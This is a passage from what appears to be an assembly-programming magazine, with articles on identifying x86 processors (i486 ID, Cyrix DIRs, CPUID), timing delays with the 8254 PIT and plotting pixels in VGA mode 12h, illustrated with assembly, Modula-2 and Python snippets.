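struct id486 decode_id486(uint16_t dx)
{
    struct id486 f;
    f.type     = (dx >> 12) & 0x3;
    f.model    = (dx >> 8) & 0xF;
    f.stepping = (dx >> 4) & 0xF;
    f.revision = dx & 0xF;
    return f;
}
```

For the example value 0421 (i486SX) this gives model 4, stepping 2 and revision 1.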
Cyrix DIR
---------
All Cyrix processors have Device Identification Registers (DIRs), which are
used to identify these processors. Before reading the DIRs, one first has to
determine that the processor is a Cyrix. This can be accomplished in two ways:
1. On modern processors, using the CPUID instruction.
2. On the first Cyrix processors, using the 5/2 method.
If there is no CPUID instruction, one has to use the second method. If one
knows that the processor is a 486, the following code can be used:
mov ax, 0005h
mov cl, 2
sahf
div cl
lahf
cmp ah, 2
je _we_are_on_cyrix
jne _this_is_not_cyrix
Once we have determined we are on a Cyrix processor, we can read its DIRs to
get its model and stepping information. All Cyrix processors have their special
registers accessible through ports 22h and 23h. Port 22h keeps register number
and port 23h register value.
; This function reads a Cyrix control register
; It expects a register address in AL and returns value also in AL
ReadCCR: out 22h, al ; select register
times 3 jmp short $+2 ; delay
in al, 23h ; get register contents
ret
DIRs have offsets 0FEh (DIR0) and 0FFh (DIR1). DIR1 contains revision, while
DIR0 contains model/stepping. The following code reads them:
mov al, 0FEh
call ReadCCR
mov [DIR0], al
mov al, 0FFh
call ReadCCR
mov [DIR1], al
Example DIR0 values:
1B Cx486DX2
31 6x86(L) clock x2
55 6x86MX clock x4
CPUID Instruction
-----------------
All newer processors have the CPUID instruction, which helps to identify on
what processor we are. Before using it, we must first determine if it is
supported, by flipping the ID flag (bit 21 of EFLAGS).
pushfd
pop eax
xor eax, 00200000h ; flip bit 21
push eax
popfd
pushfd
pop ecx
xor eax, ecx ; check if bit 21 was flipped
jnz _cpuid_supported
jz _no_cpuid
The only problem may be that NexGen processors do not support the ID flag, but
they do support the CPUID instruction. To detect this, we must hook the Invalid
Opcode exception (int 6) and execute the instruction. If the exception is
triggered, CPUID is not supported.
Also some early Cyrix processors (namely 5x86 and 6x86) have the CPUID
instruction disabled. To enable it, we must first enable the extended CCR
registers and then enable the instruction by setting bit 7 in CCR4.
; Enable extended CCRs
mov al, 0C3h ; C3 corresponds to CCR3
call ReadCCR
and ah, 0Fh ; bits 7..4 of CCR3 <- 0001b
or ah, 10h
call WriteCCR
; Enable CPUID
mov al, 0E8h ; E8 corresponds to CCR4
call ReadCCR
or ah, 80h ; bit 7 enables CPUID
call WriteCCR
The following functions are used to read/write CCRs:
ReadCCR: out 22h, al ; Select control register
times 3 jmp short $+2
xchg al, ah
in al, 23h ; Read the register
xchg al, ah
ret
WriteCCR: out 22h, al ; Select control register
times 3 jmp short $+2
mov al, ah
out 23h, al ; Write the register
ret
After enabling CPUID we must test if it is supported by flipping the ID flag,
unless of course we have determined that we are not on a 5x86 or 6x86 by
reading DIRs.
Once we have determined that CPUID is supported, we can use it to identify the
processor. The instruction expects EAX to hold a function number and returns
information corresponding to this number in EAX, ECX, EDX and EBX. The two most
important levels are listed below.
level 0 (eax=0) returns:
eax Maximum available level
ebx:edx:ecx Vendor ID in ASCII characters
Intel - "GenuineIntel" (ebx='Genu', bl='G'(47h))
AMD - "AuthenticAMD"
Cyrix - "CyrixInstead"
Rise - "RiseRiseRise"
Centaur - "CentaurHauls"
NexGen - "NexGenDriven"
UMC - "UMC UMC UMC "
level 1 (eax=1) returns:
eax bits 13..12 0 - normal
1 - overdrive
2 - secondary in dual system
bits 11..8 family
bits 7..4 model
bits 3..0 stepping
If Processor Serial Number is enabled, all 32
bits are treated as the high bits (95..64) of
the number.
edx Processor features (e.g. bit 23 indicates MMX)
There are also other levels, e.g. level 2 returns cache and TLB descriptors,
level 3 the rest of the Processor Serial Number.
Other processors (AMD, Cyrix) also support extended levels. The first extended
level is 80000000h and it returns in EAX the maximum extended level. These
extended levels return information specific to those processors, e.g. 3DNow!
support or the processor name.
This example code determines MMX support:
; First check maximum available level
xor eax, eax ; eax = 0 (level 0)
cpuid
cmp eax, 0
jng _no_higher_levels
; Now check MMX support
mov eax, 1 ; level 1
cpuid
test edx, 00800000h ; bit 23 is set if MMX is supported
jnz _mmx_supported
jz _no_mmx
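To make the register layout concrete, here is a small Python sketch (not part
of the original code) that decodes values the way CPUID returns them. The
function names are made up for illustration, and the field names follow
Intel's documentation (family in bits 11..8, model in bits 7..4, stepping in
bits 3..0).

```python
import struct

def vendor_string(ebx, edx, ecx):
    """Join the level 0 registers, in the order EBX, EDX, ECX, into 12 ASCII chars."""
    return struct.pack("<III", ebx, edx, ecx).decode("ascii")

def decode_signature(eax):
    """Split the level 1 EAX value into its bit fields."""
    return {
        "type": (eax >> 12) & 0x3,      # bits 13..12
        "family": (eax >> 8) & 0xF,     # bits 11..8
        "model": (eax >> 4) & 0xF,      # bits 7..4
        "stepping": eax & 0xF,          # bits 3..0
    }

def has_mmx(edx):
    """Bit 23 of the level 1 EDX value indicates MMX support."""
    return bool(edx & 0x00800000)
```

Feeding vendor_string the values 756E6547h, 49656E69h and 6C65746Eh gives
"GenuineIntel", which also shows why the register order is EBX, EDX, ECX.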
As this is not the place for listing all the available information about what
values are returned by CPUID, ID register or DIRs, you should get the most
recent information from the processor vendors:
www.intel.com
www.amd.com
www.cyrix.com
Also you can find very valuable information about the identification topic on:
www.sandpile.org
www.x86.org
www.cs.cmu.edu/~ralf/files.html
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Timing with the 8254 PIT
by Jan Verhoeven
Some time ago I saw a note on the mailing list from someone in need of a
flexible timer function. There are several ways to get one.
First, there is the timer tick, which is updated every 55 ms. For long
time delays, this is the best method. Just read the timer value at
0000:046C, add the desired delay (in 55 ms intervals) and wait until the
timer reaches that value.
A second approach is to use a modern BIOS, which has a timing function
in BIOS interrupt 15h, but this is "only" present on machines from 1990
or later.
A third approach is to reprogram the RTC chip. No big deal, and there's
a very accurate timer in it (up to 8 kHz) which even has interrupt
capabilities for automated functions and simple multitasking.
But by far the best way (and most universal and accurate) is to use the
"spare" timer in your PC's 8254 chip.
This chip can be put in many operating modes, but we want it to do the
following:
- start counting at a certain value
- count down
- latched reading mode
- no influence on further PC operation
The counting sequence for the PC is as follows:
- there are 2^16 BIOS-timervalue updates per hour
- there are 2^16 8254 clockpulses per timertick
So, there are 2^32 clockpulses per hour. This boils down to one clock
pulse being around 838 ns. Not bad.
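The arithmetic can be checked with a few lines of Python. This is only a
sketch using the round numbers given above (2^16 ticks per hour, 2^16 pulses
per tick); the names are illustrative.

```python
SECONDS_PER_HOUR = 3600
TICKS_PER_HOUR = 2 ** 16       # BIOS timer updates per hour (round figure)
PULSES_PER_TICK = 2 ** 16      # 8254 clock pulses per timer tick
PULSES_PER_HOUR = TICKS_PER_HOUR * PULSES_PER_TICK   # 2^32

def pulse_ns():
    """Duration of one clock pulse in nanoseconds."""
    return SECONDS_PER_HOUR / PULSES_PER_HOUR * 1e9

def tick_ms():
    """Duration of one timer tick in milliseconds."""
    return SECONDS_PER_HOUR / TICKS_PER_HOUR * 1e3

def pulses_per_ms():
    """Number of clock pulses in one millisecond."""
    return PULSES_PER_HOUR / (SECONDS_PER_HOUR * 1000)
```

The last function comes out just above 1193, which is where the constant 1193
in the MilliSeconds routine further on comes from.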
In order to make things very clear I use Modula-2 to show how the
routines are coded. Modula is an extremely structured language, so I use
it as a kind of Meta-Assembler or Pseudo-Assembler.
For those not too familiar with Modula: a CARDINAL is not an old man in
a dress, but a 16 bit unsigned integer.
Here comes.....
---------- OpenTimer ---------------------------- Start ----------
PROCEDURE OpenTimer; (* open timer chip in mode 2 *)
BEGIN
ASM
MOV AL, 34H
OUT 43H, AL
XOR AL, AL
OUT 40H, AL
OUT 40H, AL
END;
END OpenTimer;
---------- OpenTimer ----------------------------- End -----------
The value 34h is constructed as follows:
bit function
----- ---------------------------
6 - 7 select counter (0 - 3)
4 - 5 Read/write mode
1 - 3 Select countermode
0 Binary or BCD
For this case we selected:
- counter 00
- read/write two bytes from/to counterchip
- Mode 2
- binary values
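The bit layout of the control word can be decoded mechanically. The Python
sketch below is an illustration only (the function name is made up); it simply
applies the table above to a byte value.

```python
def decode_control_word(value):
    """Split an 8254 control word into the fields of the table above."""
    return {
        "counter": (value >> 6) & 0x3,   # bits 6-7: select counter
        "rw_mode": (value >> 4) & 0x3,   # bits 4-5: read/write mode
        "mode": (value >> 1) & 0x7,      # bits 1-3: counter mode
        "bcd": value & 0x1,              # bit 0: 0 = binary, 1 = BCD
    }
```

For 34h this gives counter 0, read/write mode 3 (two bytes), mode 2 and binary
counting, exactly the selection listed above.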
These few lines open the timer in "Mode 2" and prime the down counting
register to 0000. I would love to elaborate on the code, but this is all
which is needed....
It is kind of handy if you restore the state of your machine after your
application stops using the CPU. Therefore there is the following
function to restore "normal" operation of this channel.
---------- CloseTimer --------------------------- Start ----------
PROCEDURE CloseTimer; (* close timer chip *)
BEGIN
ASM
MOV AL, 36H
OUT 43H, AL
XOR AL, AL
OUT 40H, AL
OUT 40H, AL
END;
END CloseTimer;
---------- CloseTimer ---------------------------- End -----------
This function just restores the timer to its default mode and clears
the counting registers. The value "36h" means:
- counter 00
- read/write two bytes from/to counterchip
- Mode 3
- binary values
---------- ReadTimer ---------------------------- Start ----------
PROCEDURE ReadTimer () : CARDINAL; (* read timer *)
VAR Time : CARDINAL;
BEGIN
ASM
MOV AL, 6
OUT 43H, AL
IN AL, 40H
MOV AH, AL
IN AL, 40H
XCHG AH, AL
MOV [Time], AX
END;
RETURN Time;
END ReadTimer;
---------- ReadTimer ----------------------------- End -----------
After we have opened the timer, it might be a good idea to also use it.
This is done in a few steps:
- current value of counting register is stored in On-Chip buffer
- the low byte is read in first
- the high byte is read in second
- low and high byte are put in right order
Make sure you always read in TWO bytes, else you will run into framing
errors. Also keep in mind that this is a DOWN-COUNTER!
The value "6" which is sent to the 8254 first might be wrong, but in all
my software it just works fine. It selects Channel 0 to be latched. The
lower four bits of this word should be "don't care" bits, but I prefer
"not to fix a running program".
---------- MilliSeconds ------------------------- Start ----------
PROCEDURE MilliSeconds (ms : CARDINAL);
VAR MaxCount : CARDINAL;
BEGIN
MaxCount := 65535 - ms * 1193;
OpenTimer;
WHILE ReadTimer () > MaxCount DO
(* Nothing! *)
END;
CloseTimer;
END MilliSeconds;
---------- MilliSeconds -------------------------- End -----------
This function has some deliberate errors inside. I calculate MaxCount
such that it is too big. Reason: in Modula I do not control math
operations as well as in ASM (of course!) That's why I subtract the
value from 65,535 instead of 65,536. In ASM I would have used a NOT
operation, but for Modula this is good enough.
Furthermore I use the number 1193 to go from counting pulses to
milliseconds. It's a not too big number so it is good enough to use in
integer arithmetic.
This "MilliSeconds" routine is a dumb waiting-procedure. It calculates a
stop-value for the counter, initialises the counter to mode 2 and value
0000 and then waits until the timer reaches there. Next it closes the
timer and it's all over.
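One consequence of the 16 bit CARDINAL is worth spelling out: ms * 1193 has to
stay below 65536, so the routine as written can only wait for up to 54 ms. The
Python sketch below (illustrative names, not part of the original) reproduces
the MaxCount calculation and makes that limit explicit.

```python
PULSES_PER_MS = 1193
MAX_MS = 65535 // PULSES_PER_MS    # largest delay that fits in 16 bits

def max_count(ms):
    """Stop value for the down counter, as computed in MilliSeconds."""
    if not 0 <= ms <= MAX_MS:
        raise ValueError("delay must be between 0 and %d ms" % MAX_MS)
    return 65535 - ms * PULSES_PER_MS
```

For longer delays, the routine could be called repeatedly or combined with the
55 ms timer tick mentioned at the start.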
The next function, which was made for diagnostic purposes, shows that in
an application you would have to correct for the time it takes to read
the timer itself.
---------- TestTimer ---------------------------- Start ----------
PROCEDURE TestTimer;
VAR First, Last, Delta, k : CARDINAL;
BEGIN
OpenTimer;
First := ReadTimer ();
WriteCard (First, 6); Write (Tab);
FOR k := 1 TO 10000 DO
(* Nothing! *)
END;
Last := ReadTimer ();
Delta := First - Last;
WriteCard (Delta, 6); WriteLn;
CloseTimer;
END TestTimer;
---------- TestTimer ----------------------------- End -----------
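Because the counter counts DOWN and wraps around from 0 to 65535, the
difference of two readings should be taken modulo 2^16. A small Python sketch
of that calculation follows; the names are illustrative and the 838.19 ns per
pulse is the figure derived earlier.

```python
PULSE_NS = 838.19   # duration of one clock pulse, from the calculation above

def elapsed_pulses(first, last):
    """Pulses between two readings of the 16 bit down counter (one wrap at most)."""
    return (first - last) & 0xFFFF

def elapsed_us(first, last):
    """The same interval expressed in microseconds."""
    return elapsed_pulses(first, last) * PULSE_NS / 1000.0
```

This only works for intervals shorter than one full counter period (about
55 ms); longer intervals wrap more than once and cannot be told apart.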
You could use this routine to calibrate a timing loop, but on modern PC
architectures this could well lead to disasters. Modern CPUs are so
damned fast that your loop counter will overflow.
Therefore this calibration technique is only useful for modifying
inherently slow routines, like those using I/O operations. For some
reason, I/O operations still need around one microsecond each, so these
will slow down the routine enough to make sure there will be no overflow
in the loop-counters.
A friend of mine just uses IN instructions from some silly address to
get reasonably accurate timing loops, assuming that 1 IN operation is
about 1 microsecond. But it could well lead to trouble on modern PCI
hardware.
All in all, for most delay-routines, the dumb waiting function is by far
the best since it is the most reliable and accurate to less than a
microsecond. But if you need this many digits, use compensated software,
that takes into account the time to read the timers twice -- because you
need to keep in mind that also this routine relies heavily on I/O
instructions, so it is not infinitely fast!
In a future article I will describe how to use the RTC chip for
generating timing signals and how to use it via the Programmable
Interrupt Controller in automatic mode. That article will be pure ASM
again, so don't be worried about this detour into Modula.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Programming for the one and only universal graphics mode
by Jan Verhoeven
If you need to write a graphics routine that has a reasonable resolution and
which is nearly always present, there is just one choice: mode 12h or the well
known 640 x 480 x 16. This mode is the highest resolution mode which is always
available in all VGA cards.
800 x 600 is better but it either needs a VESA driver installed or the user
must himself figure out how to switch the machine to that mode. Not an easy
task for the majority of "experienced Windows users" (isn't this a paradox?).
Mode 12h is treated as a worst case by many Superior Operating Systems. But
for most purposes it is just fine. It's fast, reasonably easy to use and it is
omnipresent.
That's why I decided to port my textmode windows to this graphics mode.
The application.
----------------
I built a simple AD converter that measures voltages and converts them into
digits. The ADC fits on a COM port and is completely controlled from software.
The idea was to have different reference voltages, sample rates, scaling
factors, a bar graph display and a 4 digit LED-style read-out.
And in the bottom window there is a "recorder" that plots pixels in real-time.
Once all parts have been explained I might post the full package (the sources,
the schematics and such) so that everyone can build one of their own.
How to switch to Mode 12h?
--------------------------
Going to mode 12h is easy. Just use the BIOS interrupt 10h as follows:
mov ax, 012
int 010
and you're in. Remember, I use A86 syntax, so all numbers starting with a
nought are considered hexadecimal.
Plotting in a graphics screen.
------------------------------
Now that we're in Mode 012, we should also try to fill that clear black
rectangle. But first we should define a way of remembering WHERE to put our
cute little dots.
For all my plotting, I use the following structure:
-------------------------------- Window Information Block ------
Infoblk1 STRUC
Win_X dw ? ; top-left window position, X and ...
Win_Y dw ? ; ... Y
Win_wid dw ? ; window width and ...
Win_hgt dw ? ; ... height
CurrX dw ? ; within window, current X-coordinate, ...
CurrY dw ? ; ... and Y
DeltaX dw ?
DeltaY dw ?
Indent dw ? ; Indentation for characters in PIXELS!
Multiply dw ? ; screenwidth handler
Watte01 dw ? ;
BoxCol db ? ; border colour
TxtCol db ? ; text colour
BckCol db ? ; background colour
MenuCol db ? ; menu text colour
ENDS
-------------------------------- Window Information Block ------
It will be clear after looking at this list that each InfoBlock describes a
window, a rectangular portion of the screen, which is treated as a unit.
Each window is defined by the topleft (x,y) coordinates and the window width
and height. Knowing these four words, the window is defined and fixed on
screen. If the window is to be moved, just adjust the topleft (x,y) position.
Since it is handy to know where in this window we are plotting, I defined two
more X and Y values: "CurrX" and "CurrY". When a request to (un)plot is made,
it will start on these coordinates.
For line drawing and such there are the "DeltaX" and "DeltaY" variables. The
former is for horizontal lines, the latter for vertical lines.
Now that we have our fancy window, where we can plot and draw lines, we also
need some text to see what it's all supposed to be about. The text is plotted
at the CurrX and CurrY positions. Each character is PLOTTED there, so tokens
can be put at ANY location on screen, not just on byte boundaries.
For nice and easy alignments, I defined the variable "Indent" which defines
how many pixels from the left or right margin must remain blank.
Since this software should be as easy to adapt to other resolutions as
possible, there is a need for a "Multiply" variable. This is filled with the
offset address of a dedicated screen multiplier routine.
In Mode 012 there are 640 pixels on a line. That's 80 bytes. So in order to
calculate the pixel address you need to use the following formula:
PixAddr = CurrY * 80 + CurrX / 8
So we need a set of damned fast Mul_80 routines. If needed you can make some
of them and at init-time find out the CPU and hardware and assign a suitable
routine and fill it in in the Window definition structures.
The "Watte01" field is just a filler. Reserved by me.
Since the Mode 012 has 16 colours to spare we should also use them. Therefore
I set up space for 4 colours: Box-, Text-, Background- and Menu-colours.
Each printing routine will make sure the right colour is set.
It will be clear that each window is very flexible to use. If the position is
wrong, just change a few numbers. Also if the colours are not optimal.
And by having several windows assigned to the same area on screen, you can
easily build special effects:
fullscrn dw 0, 0,640,480, 0, 0, 0, 0, 4, mul_80, 0
db 12, 14, 3, 15 ; main screen window
FullScrn just describes the complete screen. It is used for some very general
printing and plotting tasks. It starts at topleft (0,0) and is 640 wide and 480
high.
ParWin2 dw 5, 30,630,150, 8, 9, 0, 0, 4, mul_80, 0
db 10, 11, 3, 11 ; Parameter window
This is a window which is a subwindow of the Full Screen for storing data and
parameters.
PlotWin dw 5,195,630,260, 0, 0, 0, 0, 4, mul_80, 0
db 9, 15, 3, 7 ; Virtual plotting window
This is the Virtual Plotting Window. It has some text, plus the actual
plotting window:
PlotWin2 dw 6,196,628,256, 0, 0, 0, 0, 4, mul_80, 0
db 9, 15, 3, 7 ; Actual plotting window
This is the place where the pixels live. It starts one pixel down/right of the
virtual window and also ends one pixel short of it.
The reason for making this "dummy" window structure was that this way there is
no need for elaborate checking of the extreme ends of the window while erasing
pixels. On the extremes of the "Virtual Plotting Window" there are the pixels
that make up a nice coloured box. It does not look nice when these lines are
erased. And the easiest way to prevent this was by defining two separate
windows: one for constructing the box and one for the actual work.
The 4 digit LED-style read-out is also controlled by four different windows.
Each digit has its own window definition:
------------ Digit Space ------------------------------- Start ---
DigSpac1 dw 16, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
db 9, 11, 14, 3 ; Digital display, digit 1, MSD
DigSpac2 dw 56, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
db 9, 11, 14, 3 ; Digital display, digit 2
DigSpac3 dw 96, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
db 9, 11, 12, 3 ; Digital display. digit 3
DigSpac4 dw 136, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
db 9, 11, 12, 3 ; Digital display, digit 4, LSD
MSD = Most Significant Digit LSD = Least Significant Digit
------------ Digit Space -------------------------------- End ----
This way it is convenient to align the digits on screen. As with normal
LED-style digits, the seven segments are drawn piece by piece, and erased
if necessary.
As you will know from voltmeters, the MSD is the least likely to change in
time and the LSD is most likely to be different between any two samples. So in
a way it is necessary to control erasing of just one digit without massive
software overheads. Therefore I again chose to use a separate window for each
digit. It makes erasing the digit easier and independent of the other three.
Something else to observe is, that the two or three digits behind the decimal
point have another colour from those before it. This way the user can easily
see the approximate magnitude of the number without having to search for a
decimal point. This is accomplished easily by having different BckCols in the
LSD windows.
This all costs a few bytes extra, but it saves a lot of coding.
How to quickly load a segment register.
---------------------------------------
Segment registers cannot be loaded with immediate data. So you normally push
the constant on the stack, or load it into AX, and transfer it to the actual
segment register from there. This is not necessary. It can be done much more
easily, as shown below:
VGA_base dw 0A000 ; for ease of loading segment registers
And the corresponding code:
mov es, [VGA_base]
The detour via the stack or via AX takes more cycles and bytes.
Defining what to print.
-----------------------
In a graphics screen there are an awful lot of places where to store our
text. So we need a way to define where to put which tokens. For this I use the
following construct:
-------------- Topic ----------------------------------- Start ---
Topic MACRO ; start of printing message
dw #1, #2
db #3, #4
#EM
TopicEnd MACRO ; topics stop here
dw 0F000
#EM
Topic 180, 9, 'Start : '
ParaStrt db 'Manual ', 0
Topic 9, 28, 'Power : '
ParaPowr db 'OFF', 0
Topic 360, 55, 'Group : '
ParaGrup db '16 ', 0
TopicEnd
-------------- Topic ------------------------------------ End ----
The Topic Macro puts the first two arguments (the new values for CurrX and
CurrY) in the first two WORD positions of the definition table. The actual
text is then put in the BYTE positions. In most cases there will be no #4
argument, but A86 doesn't care about that.
Each "to-print" table is shut down by a TopicEnd macro. It defines a new
CurrX of -4096 (0F000). That clearly is out of range, so this is end of table.
In normal operation, small negative values of CurrX and CurrY are accepted and
taken care of, although it can be dangerous to use this feature.
Multiplying by 80.
------------------
On recent CPUs the MUL instruction is fast, so a plain multiply will do. For
older CPUs, where MUL takes a dozen cycles or more, the following code could
mean a significant speed increase:
-------------------- Multiply ------------------------ Start ----
mul_80: push bx ; PixAddr in Mode 012
shl ax, 4
mov bx, ax ; bx = 16 x SCR_Y
shl ax, 2 ; ax = 64 x SCR_Y
add ax, bx ; ax = 80 x SCR_Y
pop bx
ret
-------------------- Multiply ------------------------- End -----
This routine is used over and over again, so a few microseconds more or less
will make a big difference.
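The shift-and-add trick rests on 80 = 16 + 64. The following Python sketch
mirrors the register steps of mul_80 (with 16 bit wrap-around, and using a
Python function in place of the original routine) so that the result can be
compared with a plain multiplication for every screen row.

```python
def mul_80(y):
    """Model of the mul_80 routine: AX = 80 * AX using shifts and one add."""
    ax = (y << 4) & 0xFFFF      # shl ax, 4   -> 16 * y
    bx = ax                     # mov bx, ax
    ax = (ax << 2) & 0xFFFF     # shl ax, 2   -> 64 * y
    return (ax + bx) & 0xFFFF   # add ax, bx  -> 80 * y

if __name__ == "__main__":
    # Compare against a plain multiply for all 480 rows of Mode 012.
    print(all(mul_80(y) == 80 * y for y in range(480)))
```

For all rows of the 640 x 480 screen the intermediate values stay well within
16 bits, so no overflow handling is needed.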
Where to leave our pixels?
--------------------------
Suppose you need to plot pixel (3,0). That's an easy one. It will fit in the
very first byte of the VGA memory array. Its segment is 0A000 and its offset
is plain 0.
But not the full byte, since that would produce a line. No, we need to access
bit 4 of byte 0.
Yes, the first pixel is bit 7 of byte 0 and the 8th pixel is bit 0 of byte 0.
Or, in index-language, CurrX = 0 addresses bit 7, and so on.
So we need to invert the screenposition into a bitposition. We'll come to that
later. Suppose, by some sheer magic, we succeeded in making that conversion,
we still need to tell the VGA which bit is involved. That's done by means of
the following routine:
--------------------- SetMask ------------------------ Start -------
SetMask: push dx ; ah = mask
mov dx, 03CE
mov al, 8
out dx, ax ; set bit mask
pop dx
ret
--------------------- SetMask ------------------------- End --------
This is an optimized routine. The VGA is a 16 bit card, so we can use 16 bit
I/O instructions for adjacent I/O ports. The construct:
mov al, 8
out dx, ax ; set bit mask
is identical to:
mov al, 8
out dx, al
inc dx
mov al, ah
out dx, al
Anyway, the plottingmask is defined to be as loaded in the AH register. We can
put any value in AH, not just one pixel, but also "no pixels" and "all
pixels".
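The equivalence of the word write and the two byte writes can be modelled as
follows. This Python sketch is only an illustration with made-up function
names: it shows which byte of AX ends up on which port.

```python
def split_word_out(port, ax):
    """Model OUT DX, AX as two byte writes: AL to port, AH to port + 1."""
    return [(port, ax & 0xFF), (port + 1, (ax >> 8) & 0xFF)]

def set_mask_writes(mask):
    """Port writes done by SetMask: index 8 to 03CE, the mask to 03CF."""
    ax = (mask << 8) | 0x08     # AH = mask, AL = 8
    return split_word_out(0x3CE, ax)
```

So AL (the register index 8) goes to port 03CE and AH (the plotting mask) goes
to port 03CF, in one instruction.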
Defining colour in Mode 012.
----------------------------
Colours to use during plotting are defined in a comparable fashion:
--------------------- Set Colour --------------------- Start -------
SetColr: push dx ; ah = colour
mov dx, 03C4
mov al, 2
out dx, ax ; select map mask register and colour planes
pop dx
ret
--------------------- Set Colour ---------------------- End --------
In Mode 013 you just can load a bytevalue colour into a memory location and
that's it. So that's an ultrafast mode, but at the price of resolution.
In Mode 012 we define colour with a series of I/O instructions. Once a colour
is set, it remains active until changed by another SetColr call. Try to
remember this when all of a sudden all kinds of fancy colours start to appear
on screen....
Where to put the pixel?
-----------------------
I have presented the formula some paragraphs before this one. Basically we
work with virtual coordinates and must translate these to real coordinates
before trying to calculate an address. This is done by:
------------------ VGA memory address ---------------- Start -------
VGaddr: ; calculate address in VGA memory
mov es, [VGA_base] ; quickly load segment register
mov ax, [di.CurrY] ; ax = current Y
add ax, [di.Win_Y] ; adjust for window offset
call [di.Multiply] ; multiply by bytes per row
mov bx, [di.CurrX] ; bx = current X
add bx, [di.Win_X] ; adjust for window offset
shr bx, 3 ; divide by 8
add bx, ax ; bx = index address into video segment
ret
------------------ VGA memory address ----------------- End --------
It's all fairly straightforward.
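For readers who prefer to check the numbers, here is the same address
calculation as a Python sketch. The function and parameter names are
illustrative; the window positions in the usage are taken from the window
definitions shown earlier.

```python
BYTES_PER_ROW = 80      # 640 pixels / 8 pixels per byte

def vga_addr(win_x, win_y, curr_x, curr_y):
    """Offset into the video segment of the byte that holds the pixel."""
    row_offset = (curr_y + win_y) * BYTES_PER_ROW   # what mul_80 delivers
    column = (curr_x + win_x) >> 3                  # shr bx, 3
    return row_offset + column

if __name__ == "__main__":
    print(vga_addr(0, 0, 3, 0))      # pixel (3,0) of the full screen
    print(vga_addr(6, 196, 0, 0))    # top-left pixel of PlotWin2
```

Pixel (3,0) of the full screen lands in byte 0, and the last pixel of the
screen, (639,479), lands in byte 38399.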
How do we plot pixels in Mode 012?
----------------------------------
This is a silly process. We cannot access all the 4 colour planes at once, so
we have used SetColr to define which colourplanes are to be affected. This all
is rather complicated. You may either take my word for it, or consult a 1200
page reference....
Now that we're ready to plot pixels, we do so by the following code:
------------------ VgaPlot -------------------- Start --------------
VgaPlot: mov al, [es:bx] ; Do the actual plotting
mov al, [ToPlot]
mov [es:bx], al
ret
------------------ VgaPlot --------------------- End ---------------
The first line is a read command. It notifies the VGA controller about the
address of the pixelbyte. The resulting data from the read is of no concern.
We immediately replace it with the value of "ToPlot". For plotting there is a
value of "FF" in this byte and for erasing there is a "00" in it.
After this comes the actual plotting function. The write to the specified
address sets the pixels as defined by AL and SetMask.
Adding it all up gives the following code to really plot a pixel:
-------- PlotPix ------------------------------- Start -----------
PlotPix: push ax, bx, cx, es ; plot a point on screen
call VGaddr
mov cx, [di.CurrX] ; calculate plottingmask
add cx, [di.Win_X]
and cx, 0111xB ; cl = position in byte
mov ah, 080
shr ah, cl ; now move the high bit backwards...
call SetMask ; use it to set mask
call VgaPlot ; and do the plotting
pop es, cx, bx, ax
ret
-------- PlotPix -------------------------------- End ------------
That's it to plot a pixel: just a few calls to some procedures we defined
earlier on. Most of this procedure is spent finding the actual bit position
in the VGA memory byte. Remember, to plot pixel 0 we need bit 7!
Therefore we load CX with the current X value, correct this for the current
window position and isolate the lower 3 bits. These indicate the position of
the pixel in screenmemory.
mov cx, [di.CurrX] ; calculate plottingmask
add cx, [di.Win_X]
and cx, 0111xB ; cl = position in byte
At this point, CL contains the n-th bit in this byte. So I load AH with the
binary pattern 10000000 and shift it right until the corresponding bit
position is reached:
mov ah, 080
shr ah, cl ; now move the high bit backwards...
I don't know if there are batches of Intel CPUs that have a problem with the
SHR instruction if CL equals zero, but I have not yet noticed any.
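The mask calculation is easy to verify outside the assembler. In the Python
sketch below (illustrative names), a shift count of zero simply leaves the
value unchanged, which is exactly what pixel 0 needs.

```python
def bit_position(screen_x):
    """Bit number inside the video byte: pixel 0 is bit 7, pixel 7 is bit 0."""
    return 7 - (screen_x & 7)

def plot_mask(screen_x):
    """Plotting mask as built by 'mov ah, 080' followed by 'shr ah, cl'."""
    return 0x80 >> (screen_x & 7)
```

For pixel (3,0) this yields bit 4, i.e. the mask 00010000.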
Lines: series of pixels.
------------------------
There are three kinds of lines: horizontal, vertical and sloped ones. Vertical
lines are plotted pixel by pixel since all of them end up in different bytes
of VGA memory. Sloped lines are best taken care of by a Bresenham-style line
drawing algorithm (although the digital differential analyser is better).
Horizontal lines are a different kind of line. In these, several adjacent
pixels are plotted. And adjacent pixels mainly are in the same VGA memory
byte. Therefore I made two horizontal line drawers. The one for short lines
(less than 17 pixels) just plots the pixels one by one.
The other algorithm, for lines of 17 pixels or more, tries to fill VGA memory
with as many byte writes as possible.
Taking care of longer horizontal lines.
---------------------------------------
Suppose our line is composed as follows:
First 1 2 3 ... K Last ; byte in video memory
......## ######## ######## ###...### ###..... ; # = pixel to be set
So our line starts at pixel 6 (i.e. bit 1) of VGA memory byte "First". Next it
lasts for N pixels and the last pixel to plot is pixel 2 (or bit 5).
We need some variables to calculate how to proceed with this in the shortest
possible time. This needs some calculations, so for short lines the math
overhead is more work than the actual plotting will take up.
First 1 2 3 ... K Last ; byte in video memory
......## ######## ######## ###...### ###..... ; # = pixel to be set
We first need to know the E-value which describes the number of pixels to plot
in the very first byte. The E-value is calculated as follows:
E-val = 8 - ((CurrX + Win_X) AND 7)
Now we know the number of pixels to plot in the very first VGA memory
location. It would however come in handy if we would know with which plotting
mask this would correspond. That's why we use it to derive the E-mask:
E-mask = FF shr ((8 - E-val) AND 7)
Next we need to know how many pixels there need to be plotted in the last
memory location. L-value and L-mask are determined as follows:
L-val = (Total - E-val) AND 7
L-mask = 080 sar (L-val - 1) ; or 0 if L-val = 0
With the SAR we shift signbits to the right until the number of pixels
corresponds with the number of bits in the mask.
The last parameter we need to know is the actual speeding-up part: the full
bytes that can be plotted. The octet-part of the routine. We do this as
follows:
K-val = (Total - E-val - L-val)/8
Now it also becomes clear why I kept the E-val and L-val parameters. They're
just needed for getting the right value for K-val.
There is, however one exceptional situation. Suppose the line we need to plot
is 26 pixels long, starting at pixel 6. This would produce the values:
E-val = 2 E-mask = 00000011
